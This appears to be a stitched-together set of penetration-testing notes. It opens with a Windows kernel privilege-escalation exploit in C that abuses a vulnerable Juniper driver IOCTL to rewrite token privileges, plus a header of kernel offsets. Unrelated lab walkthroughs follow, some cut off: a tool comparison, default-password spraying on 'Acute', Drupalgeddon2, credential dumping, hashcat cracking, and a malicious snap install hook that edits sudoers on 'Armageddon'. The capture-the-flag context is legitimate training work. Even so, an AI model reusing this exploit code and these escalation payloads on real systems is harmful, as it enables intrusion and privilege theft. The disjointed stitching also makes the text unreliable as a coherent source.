    LPVOID allocated_ptr = VirtualAlloc(0x80002018, 4096 * sizeof(uint64_t), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (allocated_ptr == NULL)
    {
        PrintError(TEXT("VirtualAlloc"));
        return;
    }
    uint64_t* new_ptr = (uint64_t*)allocated_ptr;
    for (uint64_t i = 0; i < 4096; i++) {
        *new_ptr = (uint64_t)0;
        new_ptr++;
    }

    // Raise thread priority
    int nPriority = ABOVE_NORMAL_PRIORITY_CLASS;

    printf("[+] Make the process to only run on 1 CPU\n");
    DWORD processAffinity = 1;
    BOOL res1 = SetProcessAffinityMask(
        GetCurrentProcess(),
        processAffinity
    );
    if (res1 == 0) {
        PrintError(TEXT("SetProcessAffinityMask"));
        return;
    }

    printf("\n[+] Doing TOKEN->_SEP_TOKEN_PRIVILEGES->Present\n");
    // TOKEN->_SEP_TOKEN_PRIVILEGES->Present
    WRITE_WHAT_WHERE* payload1 = (PWRITE_WHAT_WHERE)HeapAlloc(
        GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        sizeof(WRITE_WHAT_WHERE)
    );
    if (payload1 == NULL) {
        PrintError(TEXT("[!][payload1] Could not allocate the HEAP.\n"));
        return;
    }
    payload1->devicePath = devicePath;
    payload1->what = 0x0000001ff2ffffbc;
    payload1->where = (uint64_t)token_ptr + (uint64_t)0x48;
    write_mem(payload1);

    printf("\n[+] Doing TOKEN->_SEP_TOKEN_PRIVILEGES->Enabled\n");
    // TOKEN->_SEP_TOKEN_PRIVILEGES->Enabled
    // write_mem('q', token_ptr + 0x48, 0x0000001ff2ffffbc);
    /*WRITE_WHAT_WHERE payload2 = {
        .devicePath = devicePath,
        .what = 0x0000001ff2ffffbc,
        .where = (uint64_t)token_ptr + (uint64_t)0x48,
    };*/
    WRITE_WHAT_WHERE* payload2 = (PWRITE_WHAT_WHERE)HeapAlloc(
        GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        sizeof(WRITE_WHAT_WHERE)
    );
    if (payload2 == NULL) {
        PrintError(TEXT("[!][payload1] Could not allocate the HEAP.\n"));
        return;
    }

    payload2->devicePath = devicePath;
    payload2->what = 0x0000001ff2ffffbc;
    payload2->where = (uint64_t)token_ptr + (uint64_t)0x40;
    write_mem(payload2);

    // Free pointer memory
    if (allocated_ptr != NULL) {
        VirtualFree(
            allocated_ptr,       // Base address of block
            0,                  // Bytes of committed pages
            MEM_RELEASE
        );
    }

    // 4. Spawn your shell and test your privileges :
    system("powershell.exe");
}

The code contains some hardcoded values such as the offset of specific functions in ntoskrnl.exe.

#pragma once

#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <winternl.h>


#define VULN_IOCTL  0x80002018

////////

/*
 * jnprTdi_9115_15819 W10
 */

 // #define DEVICE_NAME_W L"jnprTdi_9115_15819"

 // // KxWaitForSpinLockAndAcquire
 // #define SPIN_OFFSET 0x300ea0

 // // KxTryToAcquireSpinLock
 // #define TRY_SPIN_OFFSET 0x361758

 // // void write_char(byte param_1,byte **param_2,int *param_3)
 // #define WRITE_CHAR_OFFSET 0x3d5878

 ////////

 /*
  * jnprTdi_9117_18209 W11
  */

#define DEVICE_NAME_W L"jnprTdi_9117_18209"

  // KxWaitForSpinLockAndAcquire 
#define SPIN_OFFSET 0x300e9e

// KxTryToAcquireSpinLock
#define TRY_SPIN_OFFSET 0x361757

// void write_char(byte param_1,byte **param_2,int *param_3)
#define WRITE_CHAR_OFFSET 0x3d93f8

////////

#define MAX_THREADS 8

typedef struct
{
    LPCWSTR devicePath;
    uint64_t where;
    uint64_t what;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

typedef struct
{
    DWORD id;
    DWORD threadId;
    HANDLE hdev;
    uint64_t where;
    uint8_t what;
} WRITE_WHAT_WHERE_BYTE, * PWRITE_WHAT_WHERE_BYTE;

void write_byte(void*);
void write_mem(WRITE_WHAT_WHERE*);

// From kernel.h
BOOL BuildDevicePath(LPCWSTR, LPCWSTR);
BOOL OpenDevice(HANDLE*, LPCWSTR);
void GetFunctionOffset(LPCSTR, uint64_t*);
void GetKernelBase(uint64_t*);
PVOID GetObjectPointedByHandle(HANDLE);

• dirb
• gobuster
• wfuzz

Some of them can help to do more than a siple ressource enumeration but we will focus on the enumeration part. The idea is to test these tools in order to find which one is the fastest enumeration tool. Tests will be done on the same target, where there is 3 endpoints that have the PHP extension.

dirb

dirb is part of Kali linux tools

$> dirb http://10.10.10.181/ -X .php /usr/share/wfuzz/wordlist/general/big.txt

0.32s user
1.54s system
0% cpu
17:45.79 total

Gobuster

gobuster dir -f -e -r -k -s 200 -x php -u http://10.10.10.181/ -w /usr/share/wordlists/dirb/big.txt

The statistics :

0.75s user
1.19s system
1% cpu
1:55.79 total

Wfuzz

wfuzz -c --sc 200 -w /usr/share/wordlists/dirb/big.txt http://10.10.10.181/FUZZ.php

The statistics :

174.13s user
110.00s system
101% cpu
4:38.72 total

Conclusion

It seems that dirb is the fastest web enumeration tool

Scan

As usual, both TCP and UDP port scans were done on the box. The TCP scan revealed that the following ports are open:

TCP scan

PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

User flag

HTTP Enumeration

Using sslscan, it is possible to retrive information about the certificate used on the Web server.

SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048

Subject:  atsserver.acute.local
Altnames: DNS:atsserver.acute.local, DNS:atsserver
Issuer:   acute-ATSSERVER-CA

Not valid before: Jan  6 06:34:58 2022 GMT
Not valid after:  Jan  4 06:34:58 2030 GMT

The certificate is atsserver.acute.local. It was issued by acute-ATSSERVER-CA.

Web Application atsserver.acute.local

Available resources with gop crawler :

➜  Acute gop crawler -u https://atsserver.acute.local/

[+] Crawling from URL: https://atsserver.acute.local/

[  ] [Crawler] [1 / 1] [Finished]

Internal ressources for https://atsserver.acute.local/
  -  [HTTPS] [link] https://atsserver.acute.local/New_Starter_CheckList_v7.docx
  -  [HTTPS] [link] https://atsserver.acute.local/courses/mental-health-staff-training/
  -  [HTTPS] [link] https://atsserver.acute.local/courses/healthcare-training-for-domiciliary-care-workers/
  -  [HTTPS] [link] https://atsserver.acute.local/courses/training-substance-abuse-staff/
  -  [HTTPS] [link] https://atsserver.acute.local/courses/training-learning-disability-services/
  -  [HTTPS] [link] https://atsserver.acute.local/courses/training-doctors-dental-surgery-staff/
  -  [HTTPS] [link] https://atsserver.acute.local/courses/training-childcare-staff/
  -  [HTTPS] [link] https://atsserver.acute.local/courses/schools-colleges-training/

A docx file was identified and called : New_Starter_CheckList_v7.docx.

Gobuster was used to enumerate resources :

gobuster dir -u https://atsserver.acute.local -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -H "X-Forwarded-For: 127.0.0.1"  -o gobuster_big -t 40 -b 403,404 -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://atsserver.acute.local
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.1.0
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2022/05/13 10:55:40 Starting gobuster in directory enumeration mode
===============================================================
https://atsserver.acute.local/aspnet_client        (Status: 301) [Size: 167] [--> https://atsserver.acute.local/aspnet_client/]

===============================================================
2022/05/13 10:56:11 Finished
===============================================================

Possible user list can be retrieved from the page /about.html :

WHO WE WORK WITH

Acute Health work with healthcare providers, councils and NHS units in the UK, training over 10,000 nurses, managers and healthcare workers every year. Some of our more established team members have been included for multiple awards, these members include Aileen Wallace, Charlotte Hall, Evan Davies, Ieuan Monks, Joshua Morgan, and Lois Hopkins. Each of whom have come away with special accolades from the Healthcare community.

Possible users are :

• Aileen Wallace
• Charlotte Hall
• Evan Davies
• Ieuan Monks
• Joshua Morgan
• Lois Hopkins

Docx analysis

> exiftool New_Starter_CheckList_v7.docx
ExifTool Version Number         : 12.41
File Name                       : New_Starter_CheckList_v7.docx
Directory                       : .
File Size                       : 34 KiB
File Modification Date/Time     : 2022:05:13 11:00:00+02:00
File Access Date/Time           : 2022:05:13 11:07:32+02:00
File Inode Change Date/Time     : 2022:05:13 11:07:32+02:00
File Permissions                : -rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x079b7eb2
Zip Compressed Size             : 428
Zip Uncompressed Size           : 2527
Zip File Name                   : [Content_Types].xml
Creator                         : FCastle
Description                     : Created on Acute-PC01
Last Modified By                : Daniel
Revision Number                 : 8
Last Printed                    : 2021:01:04 15:54:00Z
Create Date                     : 2021:12:08 14:21:00Z
Modify Date                     : 2021:12:22 00:39:00Z
Template                        : Normal.dotm
Total Edit Time                 : 2.6 hours
Pages                           : 3
Words                           : 886
Characters                      : 5055
Application                     : Microsoft Office Word
Doc Security                    : None
Lines                           : 42
Paragraphs                      : 11
Scale Crop                      : No
Heading Pairs                   : Title, 1
Titles Of Parts                 :
Company                         : University of Marvel
Links Up To Date                : No
Characters With Spaces          : 5930
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 16.0000

From the document information we can get information such :

• Company : University of Marvel
• Creator : FCastle
• Description : Created on Acute-PC01
• Last Modified By : Daniel

The document looks like a starter document for new people. Couple of information can be retrieved from it :

The University’s staff induction pages can be found at: https://atsserver.acute.local/Staff The Staff Induction portal can be found here: https://atsserver.acute.local/Staff/Induction

Walk the new starter through the password change policy, they will need to change it from the default Password1!. Not all staff are changing these so please be sure to run through this.

Run through the new PSWA to highlight the restrictions set on the sessions named dc_manage.

lois has the right to add it-self to site_admin group.

Complete the remote training

Remote training points to https://atsserver.acute.local/Acute_Staff_Access that point to a Windows PowerShell Web Access interface.

PSWA Connexion

Commexion was attempted with the user FCastle with the password Password1! on the machine Acute-PC01.

However, it did not work :

Sign-in failed. Verify that you have entered your credentials correctly.

Considering that the password found is tagged as a default password, we could try to hope that a user did not change it and that this password is still valide.

A potential list of users was previously extracted :

• Aileen Wallace
• Charlotte Hall
• Evan Davies
• Ieuan Monks
• Joshua Morgan
• Lois Hopkins

The login form used seems to be the first letter of the firstname and the lastname. However, because we cannot confirm it, a list of potential users was generated using gop :

> cat users.txt | while read line;
do
  f=$(echo $line|cut -d\  -f1);
  s=$(echo $line|cut -d\  -f2);
  gop generate username -f $f -s $s | tee -a windows_users.txt;
done

Connexion was attempted to the PSWA interface using the password Password1! and the generated usernames. Burp intruder was introduced.

Different results were found :

• For the user EDavies the passowrd Password1! is valid and authorised to connect to the computer Acute-PC01.
• For the user CHall the passowrd Password1! is valid but the user does not seem to have the right to connect to the computer Acute-PC01.

The user EDavies was used to connect through the PSWA interface :

Recon as EDavies

PS C:\Users\edavies\Documents>
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::9513:4361:23ec:64fd%14
   IPv4 Address. . . . . . . . . . . : 172.16.22.2
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.22.1
acute\edavies
PS C:\Users\edavies\Documents>
arp.exe -a

Interface: 172.16.22.2

Scan

As usual, both TCP and UDP port scans were done on the box. The TCP scan revealed that the following ports are open:

TCP/22

A quick enumeration on the SSH service allows me to know that the password authentication is allowed on the server.

> ssh root@10.10.10.233
debug1: Authentications that can continue: publickey,gssapi-keyex,gssapi-with-mic,password

TCP/80

THe webpage was visited and returned a login page.

Crawling the page did reveal that it might possible to register. Unfortunately, I was not able to register because an approval from the admin user is necesary.

I ran a dirb on the server and found two page with a directory listing :

• http://10.10.10.233/misc/
• http://10.10.10.233/modules/

By checking files, I cam accorss the Drupal version which is the version 7.56.

> curl http://10.10.10.233/modules/syslog/syslog.info
name = Syslog
description = Logs and records system events to syslog.
package = Core
version = VERSION
core = 7.x
files[] = syslog.test
configure = admin/config/development/logging

; Information added by Drupal.org packaging script on 2017-06-21
version = "7.56"
project = "drupal"
datestamp = "1498069849"

Version of Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 are prone to a Remote Code Execution security vulnerability known as Drupalgeddon2. More information on exploit-db.

A Metasploit exploit exists and was used to get a reverse shell on the box.

meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash

Under /var/www/html/sites/default, the settings.php file is present.

meterpreter > download settings.php
[*] Downloading: settings.php -> /mnt/pentest/Armageddon/AUDITOR/records/settings.php
[*] Downloaded 25.94 KiB of 25.94 KiB (100.0%): settings.php -> /mnt/pentest/Armageddon/AUDITOR/records/settings.php
[*] download   : settings.php -> /mnt/pentest/Armageddon/AUDITOR/records/settings.php

I looked into for sensitive information.

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

I used the information to log as the MySQL user drupaluser.

meterpreter > shell
Process 3562 created.
Channel 1 created.

mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "show databases;"
Database
information_schema
drupal
mysql
performance_schema

mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "use drupal; show tables;"
Tables_in_drupal
actions
authmap
batch
block
block_custom
block_node_type
block_role
blocked_ips
cache
cache_block
cache_bootstrap
cache_field
cache_filter
cache_form
cache_image
cache_menu
cache_page
cache_path
comment
date_format_locale
date_format_type
date_formats
field_config
field_config_instance
field_data_body
field_data_comment_body
field_data_field_image
field_data_field_tags
field_revision_body
field_revision_comment_body
field_revision_field_image
field_revision_field_tags
file_managed
file_usage
filter
filter_format
flood
history
image_effects
image_styles
menu_custom
menu_links
menu_router
node
node_access
node_comment_statistics
node_revision
node_type
queue
rdf_mapping
registry
registry_file
role
role_permission
search_dataset
search_index
search_node_links
search_total
semaphore
sequences
sessions
shortcut_set
shortcut_set_users
system
taxonomy_index
taxonomy_term_data
taxonomy_term_hierarchy
taxonomy_vocabulary
url_alias
users
users_roles
variable
watchdog

mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "use drupal; describe users;"
Field   Type    Null    Key     Default Extra
uid     int(10) unsigned        NO      PRI     0
name    varchar(60)     NO      UNI
pass    varchar(128)    NO
mail    varchar(254)    YES     MUL
theme   varchar(255)    NO
signature       varchar(255)    NO
signature_format        varchar(255)    YES             NULL
created int(11) NO      MUL     0
access  int(11) NO      MUL     0
login   int(11) NO              0
status  tinyint(4)      NO              0
timezone        varchar(32)     YES             NULL
language        varchar(12)     NO
picture int(11) NO      MUL     0
init    varchar(254)    YES
data    longblob        YES             NULL

mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "use drupal; select name,pass,mail,login from users;"
name    pass    mail    login
                        0
brucetherealadmin       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu     1607076276
test    $S$DBKu4Sj7hO5fI6tU4AtSzSXsp1eLLbpcEAG/WrVqv0LIAQMvPK37 test@test.com   0

Following hashes were extracted :

$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
$S$DBKu4Sj7hO5fI6tU4AtSzSXsp1eLLbpcEAG/WrVqv0LIAQMvPK37

I used hashcat to try to crack this hashes. The mode for Drupal 7 hashes is 7900. I used the famous wordlist rockyou.

> hashcat -m 7900 -a 0 hash.txt opt/rockyou.txt

Dictionary cache built:
* Filename..: opt/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 2 secs

$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo

Password of Drupal user brucetherealadmin was booboo. I was able to log through SSH with these credentials.

Flag

The flag d57298f3be1a3080a5bc8a8a29db4c85 was retrieved on the machine.

User enumeration in the context of the user brucetherealadmin

[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
    LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *

We can install snap with root rights. I step up a machine where I could build a snapcraft application and try to install it. However snap application are self-contained and we need to find a way to alter the root system at the installation. Hopefully, as of version 2.27 an install hook can be set on the machine. The main purpose of this feature would be to load a config file into the snap application. More information can be found here : https://kyrofa.com/posts/snap-install-time-setup-the-install-hook/.

A particular attention needs to be take onto the fact that the install hook will only be executed upon initial installation and not any refresh or remove of the application.

I build a little application with snapcraft. I firstly init an empty project with snapcraft init and then I filled the snapcraft.yaml config file.

name: evil-snap
base: core
version: '0.1'
summary: evil snap
description: |
  Evil snap.

grade: devel
confinement: devmode
architectures: [ all ]

parts:
  evil-snap:
    plugin: nil

I created an install hook under /snap/hooks/install with the following code :

#!/bin/bash

echo "brucetherealadmin ALL=(ALL:ALL) ALL" >> /etc/sudoers

Final structure is like so.

> tree evil-snap
evil-snap
└── snap
    ├── hooks
    │   └── install
    └── snapcraft.yaml

2 directories, 2 files

I then crafted the application with snapcraft.

> cd evil-snap

> snapcraft --use-lxd
Running with 'sudo' may cause permission errors and is discouraged. Use 'sudo' when cleaning.
Launching a container.
Waiting for container to be ready
Waiting for network to be ready...
snapd is not logged in, snap install commands will use sudo
snap "core" has no updates available
Skipping pull evil-snap (already ran)
Skipping build evil-snap (already ran)
Skipping stage evil-snap (already ran)
Skipping prime evil-snap (already ran)
The requested action has already been taken. Consider
specifying parts, or clean the steps you want to run again.
Snapping |
Snapped evil-snap_0.1_all.snap

> tree .
.
├── evil-snap_0.1_all.snap
└── snap
    ├── hooks
    │   └── install
    └── snapcraft.yaml

2 directories, 3 files

Code and compiled snap package can be found here archive.

I transferred the file on the server with the command scp and ran the installation of the evil-snap packet.

> scp evil-snap_0.1_all.snap brucetherealadmin@10.10.10.233:/home/brucetherealadmin/
brucetherealadmin@10.10.10.233's password:
evil-snap_0.1_all.snap

> ssh brucetherealadmin@10.10.10.233
brucetherealadmin@10.10.10.233's password:
Last login: Fri Apr 16 13:35:29 2021 from 10.10.14.160
[brucetherealadmin@armageddon ~]$ ls
evil-snap_0.1_all.snap  user.txt
[brucetherealadmin@armageddon ~]$ sudo snap install --devmode evil-snap_0.1_all.snap
[sudo] password for brucetherealadmin:
evil-snap 0.1 installed

I verified that the command was executed by checking the sudo configuration for the user brucetherealadmin.

[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
    LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
    (ALL : ALL) ALL

Configuration is well applied on the machine, it is know possible to execute any command with the sudo binary.

[brucetherealadmin@armageddon ~]$ sudo su
[root@armageddon brucetherealadmin]# whoami; hostname
root
armageddon.htb

Flag

The root flag 9dcf9d264e8bd066f405cc5ac0587da7 was retrieved on the machine.

Scan

As usual, both a TCP and UDP port scan were done on the box. The TCP scan revealed that the following ports were open:

# Nmap 7.80 scan initiated Mon Aug 17 08:31:48 2020 as: nmap -p- -sV -A --open -Pn -oA nmap_all_tcp.txt 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.026s latency).
Not shown: 65527 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-08-17 19:44:27Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

User Enumeration

The port TCP/445 was found to be open on the box. The service was tried to be accessed as an anonymous user. Available shares were listed and the share profiles$ was found to be readable as an anonymous user.

$> smbclient -N -L 10.10.10.192

 Sharename       Type      Comment